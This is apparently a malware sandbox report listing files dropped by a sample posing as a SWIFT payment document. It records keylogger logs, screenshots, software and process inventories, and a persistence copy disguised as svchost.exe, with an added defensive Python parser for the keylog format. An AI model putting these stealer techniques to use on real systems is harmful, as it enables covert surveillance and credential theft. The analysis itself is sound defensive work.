                                                                                      SHA-256:72E616E5A0F2D47D0B480E14E273E9E10FC2F25AB97D344C738C44C8201D8009
                                                                                      SHA-512:9A89DFB3B6AB1552731E0CF830534A28D5B723B476C03C1044A026AB055E9A418D79C298BA1B12AFD7C8EC2037F62FFE638DC5125AF7ADD5B5BC2042E1F2E00B
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.2.9.2.8.3.8.2.9.2.7.3.8.5.0.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.2.9.2.8.3.8.3.1.6.1.7.6.0.2.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.9.c.9.a.0.9.c.-.9.7.5.5.-.4.4.f.c.-.9.8.9.c.-.1.f.8.4.1.a.a.4.6.c.5.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.c.1.3.d.0.3.a.-.3.d.0.0.-.4.2.b.1.-.8.d.a.3.-.6.c.1.4.8.9.0.9.f.8.4.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.W.I.F.T._.U.S.D._.1.6.5.0.9.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.m.i.c.r.o.s.t.u.b...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.0.8.-.0.0.0.1.-.0.0.1.9.-.3.7.d.e.-.a.f.3.5.2.1.8.d.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.6.c.1.d.7.c.6.c.3.e.8.7.1.6.3.7.9.2.0.9.1.5.4.a.f.4.f.4.1.7.0.0.0.0.0.9.0.4.!.0.0.0.0.a.1.1.3.b.c.c.a.4.0.c.9.c.4.2.0.4.4.2.5.3.3.5.8.9.3.1.1.a.
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Mini DuMP crash report, 15 streams, Tue May 23 02:50:30 2023, 0x1205a4 type
                                                                                      Category:dropped
                                                                                      Size (bytes):464637
                                                                                      Entropy (8bit):3.2579077182450638
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:2s1Plp/By10uJIjd+pyLaphx02qUCgU/noVf/T9gIOgF553DyhdLO6J3Bfh2:2s1X40OZpYaF0Tj/mHT9RpDZ2dLp3Bf
                                                                                      MD5:8052B2F5CFE8F8A28C309C02B89CD49A
                                                                                      SHA1:D11270DC8D1A00E4427217EC093E237129941F51
                                                                                      SHA-256:898835595E822ED301CEABB47FDA5637B50CF5FB75319E5A95FB2BE56C6BAA29
                                                                                      SHA-512:24885A6F3042D070B411F8D8BF3DCE672DDD23A0D83B444F8211783546376DD99AB457FC4D01A494F1B87320B787D46B54B3C4DA96C1364E6BC16E5973CC2626
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:MDMP....... ........)ld........................\)..........<...T5.......8..............`.......8...........T...........Py...............5..........|7...................................................................U...........B.......8......GenuineIntelW...........T............)ld.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):6418
                                                                                      Entropy (8bit):3.7199641915629384
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Rrl7r3GLNi6w6E7YZRSyCpra89b4UsfCUIm:RrlsNiV6IY/Sp4HfH
                                                                                      MD5:271D78D4407CD711A5C3670DB219DC3D
                                                                                      SHA1:A04C22C786841C30359348FEBF5067C045A985A0
                                                                                      SHA-256:2551F86A0F364E1C3BB99568340A2E9DC273AA75CAF9794473582D6FB508EBD8
                                                                                      SHA-512:6E20F90DBAFA30885B4C671F77829D7E988208DC32B74289C6642627AF30B2D94590F6DDE701D682F1351BB01D16D005540A490E235DEC1FC365BECC330B30D7
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.4.0.<./.P.i.d.>.......
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):4772
                                                                                      Entropy (8bit):4.492856524796291
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:cvIwSD8zs7tJgtWI9vnWgc8sqYj/8fm8M4Jgm7fuF3+q8vum7fE0RUymGBed:uITfjQWgrsqYIJgiEKuiJRUymGcd
                                                                                      MD5:2FB224FE328DBC982CD0A7750206BB86
                                                                                      SHA1:1E01D2F1FF6C47F0E86C81A2267FCC34D4217474
                                                                                      SHA-256:E703996481DDB9940AD1013DC5C3B5E8F12D0EA51A3658B72F2D7513BF396EE8
                                                                                      SHA-512:27590CBF8FE418DB1150CC509C59324D5C421F711076477EFF3915A64F4BCA032D9D06DC22C0C7D14CE03F9432234C7FFF6224D00BC740400C41736ACB93553B
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2052721" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                      Process:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):77
                                                                                      Entropy (8bit):4.073958809208128
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:RGhz4dtedOv3RSAIdtNfKn:g4dteCRhIdtNKn
                                                                                      MD5:3982BDBCA5BE7103609955B31F2CD0B2
                                                                                      SHA1:C788B4A4C5DB64715C13AF6B876951793958AC3B
                                                                                      SHA-256:B1A814BB94D4AE163A103B0931039CCF72E5706B1122C6E32ED64F141C0AF160
                                                                                      SHA-512:8E7F3FD1E8D60578603D58C01A3B55A7B90ED1CB6350462741CCDB3C6CF37BCA45A55F83D63076663EFEC1B5E27E25621692CB270819EF03E5AD3812B48DD521
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:### explorer ### (22-05-2023 19:57:08)...### csrss ### (22-05-2023 21:40:22).
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):77
                                                                                      Entropy (8bit):4.124800138008033
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:RGhz4dtexvQAIdtM5TMv:g4dtexvIdtM5Av
                                                                                      MD5:BDF6B6B7C7F946D5F3BB7A9E7CF5A68C
                                                                                      SHA1:840562587E34EF2A8B1A6637E1A30731D024F405
                                                                                      SHA-256:4EF4CB62A6EEB19472C638637F450D39F84EAF0C78C21349B272BB49CD42ABCE
                                                                                      SHA-512:BF399B13B7B2D17391C4F51A5A984DBAE48DA50CDCF9B81B6C9B8A676BE228F1085BE8F9C8D21C1EBE2B9080029C21664E1E82410F707C24C77DB211286A2597
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:### explorer ### (22-05-2023 19:56:39)...### csrss ### (22-05-2023 20:46:44).
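The two 77-byte "ASCII text" drops above (one written by the original SWIFT_USD_165092.exe, one by its persistence copy under AppData\Roaming\svchost\) are the keylogger's output: only section headers of the form "### <process> ### (DD-MM-YYYY HH:MM:SS)" and no keystrokes, because nothing was typed in the sandbox. The parser below is an added example for working such an artifact during incident response; it is not Joe Sandbox or Typhon code. The sample log is constructed to mirror the header layout in the previews, and the keystroke lines and the "chrome" section in it are invented for illustration; the exact line terminators of the real file are not shown in the report, so the parser accepts any.

```python
"""Parse a Typhon-style keylog drop into per-window sections (added example)."""
import re
from dataclasses import dataclass, field
from datetime import datetime

# Constructed sample: header layout copied from the dropped-file previews above,
# keystroke content and the "chrome" section are invented for the example.
SAMPLE_LOG = (
    "### explorer ### (22-05-2023 19:56:39)\n"
    "\n"
    "### chrome ### (22-05-2023 20:01:12)\n"
    "user@example.test\n"
    "Passw0rd!\n"
    "### csrss ### (22-05-2023 20:46:44)\n"
)

# Header line: "### <focused process label> ### (DD-MM-YYYY HH:MM:SS)"
HEADER_RE = re.compile(
    r"^### (?P<label>.+?) ### \((?P<ts>\d{2}-\d{2}-\d{4} \d{2}:\d{2}:\d{2})\)\s*$"
)
TS_FORMAT = "%d-%m-%Y %H:%M:%S"


@dataclass
class Section:
    label: str                 # process/window label from the header
    started: datetime          # timestamp from the header (victim local time)
    keystrokes: list = field(default_factory=list)


def parse_keylog(text: str) -> list:
    """Split the log into sections; every non-header line is attributed to the
    most recent header (i.e. the window that had focus when it was typed)."""
    sections = []
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            sections.append(Section(m["label"], datetime.strptime(m["ts"], TS_FORMAT)))
        elif line.strip():
            if not sections:
                # Keystrokes before any header: attribute them to an unknown window.
                sections.append(Section("<unknown>", datetime.min))
            sections[-1].keystrokes.append(line)
    return sections


def sections_with_input(sections) -> list:
    """Labels of the sections in which something was actually typed."""
    return [s.label for s in sections if s.keystrokes]


def capture_window(sections):
    """Time between the first and last header, i.e. how long the logger ran.
    Returns None when there are fewer than two headers."""
    if len(sections) < 2:
        return None
    return sections[-1].started - sections[0].started


if __name__ == "__main__":
    for s in parse_keylog(SAMPLE_LOG):
        print(f"{s.started:%Y-%m-%d %H:%M:%S}  {s.label:<10} {len(s.keystrokes)} line(s)")
```

Applied to the real 77-byte drops, parse_keylog returns two empty sections; the interesting field is then capture_window, which for the Desktop copy spans 19:56:39 to 20:46:44 and for the svchost copy 19:57:08 to 21:40:22, matching the two separate runs (original sample, then the scheduled-task persistence copy) seen elsewhere in the report.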
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2201
                                                                                      Entropy (8bit):5.181556325666345
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2ePf/3xJvI/+7NUf2OUaGAtWc6UxeH1wVcwfClwBcxuzPFpfPHTPPd4PHJAkPFpW:2ePf/3/vI/+5Uf2OUaGoWc6UxeVwVcwb
                                                                                      MD5:904843B16779606555C17E41A97EFF91
                                                                                      SHA1:43113602D2E3C367BBA596B18F39D2C9BD799A7E
                                                                                      SHA-256:9CB7BF4D0459C428B70C281DE0A90E150AEDF036DBB54C082F1E52DC5F6C3A43
                                                                                      SHA-512:5BD1F9EC37CD32D80162693322C6A3F1AC5FA0F3737853516571DE64A4A2C8C7E17104A0203FDB4B550F7E61659B6AFB66AECCF9D6516563094A65C73E88D15A
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:1> Microsoft DCF MUI (English) 2016..2> Microsoft Office Professional Plus 2016..3> Microsoft OneNote MUI (English) 2016..4> Microsoft Office OSM MUI (English) 2016..5> Microsoft Office OSM UX MUI (English) 2016..6> Microsoft InfoPath MUI (English) 2016..7> Microsoft Access MUI (English) 2016..8> Microsoft Office Shared Setup Metadata MUI (English) 2016..9> Microsoft Excel MUI (English) 2016..10> Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2016..11> Microsoft Access Setup Metadata MUI (English) 2016..12> Microsoft PowerPoint MUI (English) 2016..13> Microsoft Publisher MUI (English) 2016..14> Microsoft Outlook MUI (English) 2016..15> Microsoft Office 64-bit Components 2016..16> Microsoft Office Shared 64-bit MUI (English) 2016..17> Microsoft Groove MUI (English) 2016..18> Microsoft Word MUI (English) 2016..19> Microsoft Skype for Business MUI (English) 2016..20> Microsoft Office Proofing (English) 2016..21> Microsoft Office Shared MUI (English) 2016..22> Microsoft Office
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):23281
                                                                                      Entropy (8bit):5.60616812479971
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:dj1F1H7HxHQhHONIjT0kjTmjTvLH+h6jTAk6bpQJgMsRKU/+xxpof2h6ixGrrwpN:23/3m3r3zJ
                                                                                      MD5:DA991073BB7A670255418366D47D8BE2
                                                                                      SHA1:DA28ED568153E5D7015CD03C5F4D9E91F0A945C3
                                                                                      SHA-256:5660FFD830F045E0A02DE0CC7C0C5F5216613A977224BD5073AAF80A739CF00C
                                                                                      SHA-512:F1C272FC42651F09BF32625558A7A42806B9F31E87666ECE9019D31704DA69C474761A972A632EBAA2C99000CC71750393A1BF38C6FA2BEF3D108621CBD837B3
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:PID: 476.Process Name: csrss.exe.Executable Path: .=================.PID: 556.Process Name: winlogon.exe.Executable Path: .=================.PID: 684.Process Name: fontdrvhost.exe.Executable Path: .=================.PID: 984.Process Name: dwm.exe.Executable Path: .=================.PID: 3004.Process Name: sihost.exe.Executable Path: c:\windows\system32\sihost.exe.=================.PID: 3024.Process Name: svchost.exe.Executable Path: c:\windows\system32\svchost.exe.=================.PID: 3064.Process Name: svchost.exe.Executable Path: c:\windows\system32\svchost.exe.=================.PID: 3224.Process Name: ctfmon.exe.Executable Path: .=================.PID: 3324.Process Name: explorer.exe.Executable Path: C:\Windows\Explorer.EXE.=================.PID: 3568.Process Name: dllhost.exe.Executable Path: C:\Windows\system32\DllHost.exe.=================.PID: 3836.Process Name: ShellExperienceHost.exe.Executable Path: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):84245
                                                                                      Entropy (8bit):7.895453333225591
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy+UOvPrQ9aIECUEfcbTAIUPwJyUpT84jcw2nDdHADouwvYB1Wi+dCrF6j5N1:gy3s9aOU0c4uIwydADo0HUjV
                                                                                      MD5:AF1942A663D0DF5FE3089099A7213E25
                                                                                      SHA1:D3565909DAADB5F9FBC2BCC363BAEBB98F3B5343
                                                                                      SHA-256:7E1AD505E9B3E9C914DC06E4D80AB0EFF5964371DF790F189D4310245C820485
                                                                                      SHA-512:3D3297AC88A12C9280F9DF219D6968C0F5F17E837307E717E79294BDCD099B0B67283A742A550654FEA32E195DB6E939D9D3EADAB78A838203B9A1390B04EC73
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......
                                                                                      Process:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):84239
                                                                                      Entropy (8bit):7.89456284925432
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy+UOvPrQ9aIECUEfcbTAIUPwJyUpT84jcw2nDdHADouwvYB1Wi+dC3e6Ij9nTI:gy3s9aOU0c4uIwydADo0bcj9I
                                                                                      MD5:F8BBE21BC63277A7F37EDD458A0630D8
                                                                                      SHA1:268A8BE6C9916CE0D9B785F6EA9961994CFCA9B1
                                                                                      SHA-256:D99B260C56E912DDC86BF4EC93E572ECAC1A6D2D0BC6BF07CF8BB1A4FC393D2C
                                                                                      SHA-512:07424F2E7CF25D5AAEF6D6F9E9724E3AB0DC3D51733E36A11864C8E0A3135695D4AB2F277A8BF6C0849C9F3A7A2F5BCDCA01FCD4646EDD6E5B2122EB6381AA0E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......
                                                                                      Process:C:\Users\user\AppData\Roaming\svchost\svchost.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):84391
                                                                                      Entropy (8bit):7.895236454518409
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy+UOvPrQ9aIECUEfcbTAIUPwJyUpT84jcw2nDdHADouwvYB1Wi+dCIFHPbR:gy3s9aOU0c4uIwydADo0k1R
                                                                                      MD5:83211BCFBB2C48F3D52B0E1C01453E3E
                                                                                      SHA1:0C834300BCCA6BDB7607577D472FEF41DC3565E8
                                                                                      SHA-256:4367CE34BE0E7CD8CB0AC2B2CDFE40E0A6444B5320D53628F4F615390B77C8B6
                                                                                      SHA-512:237F275CEC6512A31BC4CA453C8A0838D8B3F4CB9DE61D8F40A906B0EB1CDE8ED33479A2D6F613295D8586B6A09749A39453C73991510EA40796E6B6ED2DE29D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):84245
                                                                                      Entropy (8bit):7.895453333225591
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy+UOvPrQ9aIECUEfcbTAIUPwJyUpT84jcw2nDdHADouwvYB1Wi+dCrF6j5N1:gy3s9aOU0c4uIwydADo0HUjV
                                                                                      MD5:AF1942A663D0DF5FE3089099A7213E25
                                                                                      SHA1:D3565909DAADB5F9FBC2BCC363BAEBB98F3B5343
                                                                                      SHA-256:7E1AD505E9B3E9C914DC06E4D80AB0EFF5964371DF790F189D4310245C820485
                                                                                      SHA-512:3D3297AC88A12C9280F9DF219D6968C0F5F17E837307E717E79294BDCD099B0B67283A742A550654FEA32E195DB6E939D9D3EADAB78A838203B9A1390B04EC73
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):84245
                                                                                      Entropy (8bit):7.895453333225591
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy+UOvPrQ9aIECUEfcbTAIUPwJyUpT84jcw2nDdHADouwvYB1Wi+dCrF6j5N1:gy3s9aOU0c4uIwydADo0HUjV
                                                                                      MD5:AF1942A663D0DF5FE3089099A7213E25
                                                                                      SHA1:D3565909DAADB5F9FBC2BCC363BAEBB98F3B5343
                                                                                      SHA-256:7E1AD505E9B3E9C914DC06E4D80AB0EFF5964371DF790F189D4310245C820485
                                                                                      SHA-512:3D3297AC88A12C9280F9DF219D6968C0F5F17E837307E717E79294BDCD099B0B67283A742A550654FEA32E195DB6E939D9D3EADAB78A838203B9A1390B04EC73
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):76901
                                                                                      Entropy (8bit):7.760826898112166
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQ4hJj4vSSSSSSSSSSSSSSSSSSSSSvNYqfi2F+WwWaV+cNGKU32OlZwHY12v3B00:mnd5f3PwB+oUNlZEYovR7zENzmUkWK0Q
                                                                                      MD5:8361B7611F41BA3127C669F593CDECC2
                                                                                      SHA1:34B9006293CF11626774992911EB0906EA514FA9
                                                                                      SHA-256:804145F7E3A07C7DD406E73E18B73043548C8EC9FEBD58C330E8A81AF43CC8C7
                                                                                      SHA-512:5DB2AF8125E110011BB74B09343963B9AAC41808A7FF628498DB657B17E4EDDC3AB33262C8194915CC094568078B863B2581D99442A01B15ACA3CDB93B46DAD1
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......
                                                                                      Process:C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):76136
                                                                                      Entropy (8bit):7.766515045210286
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:CQy9AqGFSSSSSSSSSSSSSSSSSSSS4kzbNjxn0MEM+nfp6FznCUyi0iKJrL+FrwkF:gGwkzSMijhiJgkuVfCz0D3u
                                                                                      MD5:B2C6E4E2CD22D16B3A5FE68F0AE8E0BA
                                                                                      SHA1:4573AD21ED7828AA3199FD2C934357B2D7E8F391
                                                                                      SHA-256:197FAEE66A627C8D0B6EC8DAA34C645FB068C2BFF28B1D30F41D1A8373C0231B
                                                                                      SHA-512:81A8CBEE3B44366E8A314D41790F802EE8478FF34635BE18B1B45DBDB7DC571F295417A20AF09DACBF13EA0FC49475CA0E46EEFE11BAE0420D4F429D7F8BFA99
                                                                                      Malicious:false
                                                                                      Reputation:unknown
